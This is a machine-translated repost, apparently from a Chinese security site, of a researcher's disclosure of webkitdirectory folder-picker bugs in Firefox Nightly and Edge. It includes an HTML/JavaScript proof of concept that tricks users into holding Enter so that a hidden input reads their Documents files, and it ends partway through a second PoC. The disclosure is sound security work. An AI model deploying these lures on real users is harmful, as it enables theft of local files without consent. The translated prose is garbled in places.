For cross-browser local file disclosure vulnerability analysis-vulnerability warning-the black bar safety net

2017-04-17T00:00:00
ID MYHACK58:62201785312
Type myhack58
Reporter 佚名
Modified 2017-04-17T00:00:00

Description

Foreword

You know? You can easily turn ordinary file selector into a folder picker, to do this, simply drag the attribute“webkitdirectory”added to the type ='file'in the given input element on the line.

Of course, with the folder selector is different, eventually you will load a given folder all the files. This is an obvious vulnerability, it's a burst of busy after my final in the three major browsers found in a number of relevant security vulnerabilities.

In the following, I will for different browsers were introduced.

Firefox browser

I have submitted three with Mozilla webkitdirectory functions related to security vulnerabilities. Fortunately, the folder selector only in Mozilla Nightly version of the browser provides a corresponding implementation, this version is in stable version before the release to test new features.

Bug 1295914--webkitdirectory can be used to lure the user to allow access to any folder SEC-MEDIUM)

I report the folder selector aspect of the first security vulnerability with poor semantic related. This security vulnerability is subject to Google Chrome to fix a vulnerability inspired found, this vulnerability can be used to deceive the unsuspecting user.

Bug 1319370(CVE-2017-5414)webkitdirectory--OSuser name leaked SEC-MEDIUM)

I think the second vulnerability is the leak of the local file of the key. The problem here is that, when the file selector is opened once, then the second time you open it, it will“downgrade”folder.

So I created a PoC, which effect is: if we trick victims into press and hold the“Enter”key while the pop-up a folder, it can cause the user to unknowingly“chosen”to certain folders.

In order to get theoperating systemthe user name, the victims need to press and hold for two folders dialog confirmation button, because on Windows the default directory is'C:\ Users \ {username} \ Desktp \'it.

This is the use of this vulnerability is the dependence on the primary user interaction, this is mainly influenced by an older Mozilla vulnerability inspired. Another way is to trick the user repeatedly presses a certain position and the pop-up folder, so that the words“confirm pick”button will be automatically pressed.

Bug 1338637--any input a local file[webkitdirectory] SEC-MEDIUM)

I found that if the user presses the“Enter”key to pop up a folder, then we can deceive the victims so that we can access the default directory of all files. Of course, this approach still has some limitations, because on Windows operating system, it seems that only the“My Documents”folder is affected by this.

If it is a"My Documents"folder such as“desktop”by default, then not load anything. However, in the otheroperating system, the situation is different.

Fortunately, we said before there is a vulnerability, where the folder will be in the folder selector used after the“downgrade”, so here you can take advantage of this.

The following is the original PoC. Please note that a single with the first security vulnerability is not enough, only in the combination of the second and third security vulnerability only after the final got a PoC.

<html>

<head>

</head>

<body>

<style>

q{

opacity:0.0;

}

</style>

<b>Hold down enter for 5 seconds to prove you're human</b>

<input type=file id=q webkitdirectory='true'><br>

<textarea id="qtxt" style="height:300px;">Things grabbed:</textarea>

<script>

var i=25;

document. onkeypress=function(e){if(q. value. length>0){qtxt. value+=(q. value+'\n');}

if(q. value=='Documents'){

window. i=1000;

}

if(e. key==='Enter'){

window. i--;

if(window. i<3){

q. click();

}

}

};

q. onchange=function(){

if(window. i>10){

document. body. innerHTML=('I can read '+q. files. length+' files from the Documents folder');

}

}

</script>

</body>

</html>

Microsoft Edge browser

I'm on the Edge, found a similar security flaw, except that the default directory is“my documents”, so I noted in the report, folder selector can be used to receive victims in the document folder of all files.

This vulnerability has now been fixed.

The original PoC of:

<html>

<head>

<title>

Read all files on the PC - PoC - By @qab

</title>

<style>

thing {

opacity: 0.0;

}

</style>

</head>

<body>

<h3 id="qmsg">Hold down the ENTER key for 5 seconds to prove you're human..</h3>

<input id="thing" type="file" webkitdirectory mozdirectory accept="text/*" />

<script>

[1] [2] next